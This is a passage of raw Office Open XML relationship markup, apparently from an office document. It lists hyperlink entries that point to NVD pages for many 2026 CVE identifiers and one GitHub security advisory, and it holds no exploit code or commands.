TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89530" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89533" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89536" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89538" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89541" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89542" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89546" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89550" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89551" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89555" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89558" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89610" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89611" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89612" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89613" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89614" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89633" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89635" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89636" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89637" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89643" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89651" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89652" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89653" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89654" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89655" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89656" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89658" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89659" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89660" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89662" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89669" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89674" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89675" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89676" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89677" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89681" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89686" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89688" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89689" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89702" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89703" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89708" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89712" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11746" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38056" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61410" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82466" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86151" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54072" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72709" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72710" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80238" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87984" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89010" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89249" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89253" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89254" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89255" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89256" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89258" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89259" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89448" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3869" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47839" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54047" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87983" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89212" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89243" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90456" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57162" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57163" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75803" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80945" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89532" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89537" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89630" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89631" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89634" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89649" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89650" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89671" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89672" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89697" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89713" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11745" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12894" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21094" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62102" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62106" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62107" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71416" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72984" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73784" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78224" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80935" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80937" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80989" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84645" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84648" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84650" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85236" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85677" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89009" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89445" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89450" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89493" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89513" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89534" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89569" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89601" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89626" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89663" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89725" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89729" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19486" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44715" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48059" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72708" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81532" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82578" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88260" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89013" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89146" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89147" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89174" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89176" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89177" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89178" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89250" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89260" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89262" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90444" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-78fp-cf4h-g36p" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38058" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79698" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85979" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86299" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70341" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7863" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80932" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80953" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80967" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81004" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81012" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81017" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89066" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89452" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 